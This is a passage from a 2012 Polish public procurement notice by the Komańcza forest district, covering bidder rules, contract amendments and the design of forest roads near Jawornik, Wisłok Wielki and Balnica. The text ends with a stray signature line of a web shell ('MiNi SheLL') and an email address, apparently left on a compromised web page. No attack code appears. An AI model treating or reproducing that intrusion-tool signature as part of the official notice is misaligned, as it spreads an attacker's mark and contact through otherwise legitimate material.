- zakończenia realizacji zamówienia potwierdzającego posiadanie stosownego doświadczenia 
Tabele kursów walut dostępne są pod następującym adresem internetowym: 
http://www.nbp.pl/home.aspx?f=/Kursy/kursy.html 

4. Dokumenty składane są w oryginale lub kopii poświadczonej przez Wykonawcę za zgodność z oryginałem. W przypadku składania elektronicznych dokumentów, powinny być one opatrzone przez Wykonawcę bezpiecznym podpisem elektronicznym, weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. 

5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, które wykazując spełnianie warunku, o którym mowa w art. 22 ust. 1 pkt 4 ustawy pzp, polegają na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty. 

6. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 

7. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Wykonawcy zobowiązani są do przedstawienia dokumentów, oświadczeń zawierających stwierdzenia zgodne z faktami i stanem prawnym istniejącym w chwili ich składania. 

8. W przypadku złożenia nieprawdziwych informacji mających wpływ lub mogących mieć wpływ na wynik prowadzonego postępowania, Zamawiający wykluczy Wykonawcę z postępowania na podstawie art. 24 ust. 2 pkt 3 ustawy pzp.
9. Wykonawcy wspólnie ubiegający się o udzielenia zamówienia. 

1) Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia (np. konsorcjum) powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków, a także nie podlegać wykluczeniu z postępowania o udzielenie zamówienia oraz złożyć dokumenty potwierdzające brak podstaw do ich wykluczenia, zgodnie z zapisami zawartymi rozdziale XI ust. 1,2,3 niniejszej SIWZ:

a) spełnienie warunków dotyczących posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, a także sytuacji ekonomicznej i finansowej - oceniane będzie, ich łączne spełnienie przez członków konsorcjum, 

b) spełnienie warunków określonych w art. 24 ust. 1 ustawy pzp - oceniane będzie ich spełnienie odrębnie przez każdego z członków konsorcjum. 
10. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym oraz osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiają w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (wzór- załącznik nr 7 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113 poz. 759 z późn. zm.), Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności jeżeli wystąpi co najmniej jedna lub kilka z wymienionych niżej okoliczności : 

1) potrzeby zmiany terminu wykonania zamówienia spowodowanej: 

a. Jeżeli zajdzie konieczność wprowadzenia w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót budowlanych albo w innych dokumentach zmian, wywołanych zmianami w przepisach prawa, norm i standardów albo zmianami w wiedzy technicznej; 
b. W wyniku odmowy wydania lub nieterminowego wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień lub postanowień z przyczyn niezawinionych przez Wykonawcę;

c. W przypadku przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki ochrony prawnej, wykorzystywane przez oferentów lub inne podmioty, a termin zakończenia przedmiotu umowy określony został datą; 

d. w następstwie okoliczności leżących po stronie Zamawiającego, w szczególności w przypadku czasowego wstrzymania prac przez Zamawiającego; 

e. w przypadku wystąpienia konieczności wykonania robót dodatkowych, które mimo należytej staranności niebyły wcześniej do przewidzenia. 

2) W przypadku wystąpienia którejkolwiek z wymienionych okoliczności, termin realizacji zamówienia ulega odpowiedniemu wydłużeniu o czas niezbędny na należyte spełnienie świadczenia, nie dłużej jednak niż czas trwania tych okoliczności. 

3) Pozostałe zmiany. 

a) W przypadku zmiany stawki podatku od towarów i usług (VAT); ceny netto określone w ofercie i umowie pozostają niezmienne przez cały okres obowiązywania umowy. Jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), od chwili zmiany podatek w nowej stawce będzie doliczany do dotychczasowych cen netto, bez konieczności zmiany umowy (nie dotyczy przypadków objęcia obowiązkiem podatkowym w zakresie tego podatku Wykonawcy, który w dniu podpisania umowy nie był płatnikiem podatku VAT), 

b) Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy; zmiany mogą dotyczyć zakresu wykonywanych prac, zmian rodzaju i zakresu dokumentacji oraz zmniejszenia wynagrodzenia o kwoty odpowiadające cenie prac, z których Zamawiający rezygnuje; jeżeli pomimo prawidłowo wszczętego i prowadzonego postępowania przed organem administracji, nie jest możliwe uzyskanie dokumentów niezbędnych do dalszej realizacji umowy; 

c) Zmiana lokalizacji projektowanych obiektów; jeżeli konieczność taka wynikać będzie z przyczyn technicznych, ekonomicznych lub prawnych, w szczególności na podstawie wyników badań geologicznych i geotechnicznych, obliczeń hydrologicznych albo zaleceń organów opiniujących, zezwalających, kontrolujących albo innych uprawnionych organów. 

4. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy pzp: 
1) Zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego); 

2) Zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami; 

5. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Strony mogą wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 

6. Zmiany umowy są skuteczne jeżeli zostaną wprowadzone z zachowaniem formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_komancza/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Komańcza,
38-543 Komańcza 125.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2012 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, 38-543 Komańcza 125, w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa i przebudowa dróg  leśnych w Nadleśnictwach: Komańcza, Rymanów, Lesko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Całość inwestycji budowlanej będzie realizowana etapami wymagającymi odrębnych postępowań prowadzonych przez trzy Nadleśnictwa.

W projekcie należy uwzględnić podział przedmiotu zamówienia na trzy odrębne zadania:
Zadanie 1 - Budowa drogi leśnej Jawornik - Wisłok Wielki na długości 
                     ok. 7 400m. 
Projektowana droga zlokalizowana zostanie na gruntach leśnych będących własnością Skarbu Państwa w zarządzie Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Komańcza oraz będzie stanowić połączenie z istniejącą drogą Jawornik nr inw. 380/242, biegnącą przez tereny Nadleśnictwa Lesko oraz z drogą nr inw. 242/610 (Izwór), biegnącą przez tereny Nadleśnictwa Rymanów, które będą wykorzystywane w celach transportowych przy budowie drogi.
  
W projekcie należy uwzględnić między innymi roboty polegające na wykonaniu: 
- drogi jednopasmowej o szerokości 3,5 m z poboczami 0,75 m, szerokość korpusu 
  drogi - 5,00m
- nawierzchni drogi zgodnie z przyjętą technologią z zatwierdzonej koncepcji
- mijanek ( ilość i parametry z wyliczenia na etapie projektowania)
- zjazdów z drogi, składów drewna, przepustów pod koroną drogi (ilość i parametry z
  wyliczenia na etapie projektowania) 
- rowów przydrożnych (w miarę potrzeb), 
  oraz innych nie wymienionych robót niezbędnych do prawidłowego wykonania
  planowanej inwestycji. Zakres opracowań może ulec zmianie po dokonaniu
  szczegółowych obmiarów przez projektanta. Rozwiązania techniczne oraz zakres
  dokumentacji muszą być zaakceptowane przez Zamawiającego.

Lokalizacja planowanej inwestycji: 
woj. podkarpackie, powiat sanocki, Gmina Komańcza, Nadleśnictwo Komańcza, Leśnictwo Turzańsk.
Planowana inwestycja zlokalizowana jest na terenie obszaru NATURA 2000 - PLB 180002, oraz na terenie Obszaru Chronionego Krajobrazu Beskidu Niskiego.

Zadanie 2 - Przebudowa drogi leśnej (Izwór) nr inw. 242/610
                      
Projektowana droga zlokalizowana jest na gruntach leśnych będących własnością Skarbu Państwa w zarządzie Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Rymanów oraz będzie stanowić połączenie z nowo - wybudowaną drogą Jawornik - Wisłok Wielki.

W projekcie należy uwzględnić zakres planowanych robót w Nadleśnictwie Rymanów polegające na wykonaniu: 
- przebudowy drogi leśnej nr inw. 242/610 (Izwór) na odcinku długości ok. 3 100m: 
  wykonanie nakładki tłuczniowo - klińcowej, udrożnienie rowów, przepustów oraz
  wykonanie poszerzeń na łukach. Jakość wykonanych prac zgodnie ze standardem 
  drogi leśnej wg. Poradnika budowy dróg leśnych.
- wykonanie nowego odcinka drogi leśnej w oddziałach: 370, 369, 372,376 o długości ok. 1300mb. Jakość prac zgodnie ze standardem drogi leśnej wg. Poradnika budowy dróg leśnych.

Lokalizacja planowanej inwestycji: 
woj. podkarpackie, powiat sanocki, Gmina Komańcza, Nadleśnictwo Rymanów, Leśnictwo Wisłok.
Planowana inwestycja zlokalizowana jest na terenie obszaru NATURA 2000 - PLB 180002, oraz na terenie Obszaru Chronionego Krajobrazu Beskidu Niskiego.

Zadanie 3 - Przebudowa drogi leśnej Jawornik nr 22, nr inw. 380/242
                      
Projektowana droga zlokalizowana jest na gruntach leśnych będących własnością Skarbu Państwa w zarządzie Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Lesko oraz będzie stanowić połączenie z nowo - wybudowaną drogą Jawornik - Wisłok Wielki.

W projekcie należy uwzględnić zakres planowanych robót w Nadleśnictwie Lesko polegające na wykonaniu: 
- przebudowy drogi leśnej nr inw. 380/242/610 na odcinku długości ok. 1 830m: 
 Zakres niezbędnych robót drogowych na odcinku wykorzystywanym do budowy drogi Jawornik - Wisłok Wielki określi projektant. Jakość wykonanych prac zgodnie ze standardem drogi leśnej wg. Poradnika budowy dróg leśnych.

Lokalizacja planowanej inwestycji: 
woj. podkarpackie, powiat sanocki, Gmina Komańcza, Nadleśnictwo Lesko, Leśnictwo Jawornik.
Planowana inwestycja zlokalizowana jest na terenie obszaru NATURA 2000 - PLB 180002, oraz na terenie Obszaru Chronionego Krajobrazu Beskidu Niskiego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa drogi leśnej Balnica - Wola Michowa na długości ok. 7 300m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Projektowana  droga zlokalizowana zostanie na gruntach leśnych będących własnością Skarbu Państwa w zarządzie Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Komańcza. 
Przebiegać będzie przez tereny dwóch leśnictw: Czarny Las oraz Wola Michowa, stanowić będzie połączenie z istniejącą drogą leśną Balnica nr inw. 242/542,  oraz z drogą leśną Wola Michowa nr inw. 242/533.
 
W projekcie należy uwzględnić między innymi roboty polegające na wykonaniu: 
- drogi jednopasmowej o szerokości 3.5 m z poboczami 0.75 m, szerokość korpusu 
  drogi - 5,00m
- nawierzchni drogi zgodnie z przyjętą technologią z zatwierdzonej koncepcji
- mijanek ( ilość i parametry z wyliczenia na etapie projektowania)
- zjazdów z drogi, składów drewna, przepustów pod koroną drogi (ilość i parametry z 
  wyliczenia na etapie projektowania) 
- rowów przydrożnych (w miarę potrzeb), 
  oraz innych nie wymienionych robót niezbędnych do prawidłowego wykonania
  planowanej inwestycji. Zakres opracowań może ulec zmianie po dokonaniu
  szczegółowych obmiarów przez projektanta. Rozwiązania techniczne oraz zakres
  dokumentacji muszą być zaakceptowane przez Zamawiającego.

 Lokalizacja planowanej inwestycji: 
woj. podkarpackie, powiat sanocki, Gmina Komańcza, Nadleśnictwo Komańcza Planowana inwestycja zlokalizowana jest na terenie obszaru NATURA 2000 - PLC 180001 Bieszczady, oraz na terenie Cieśniańsko - Wetlińskiego Parku Krajobrazowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6, 71.32.00.00-7, 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com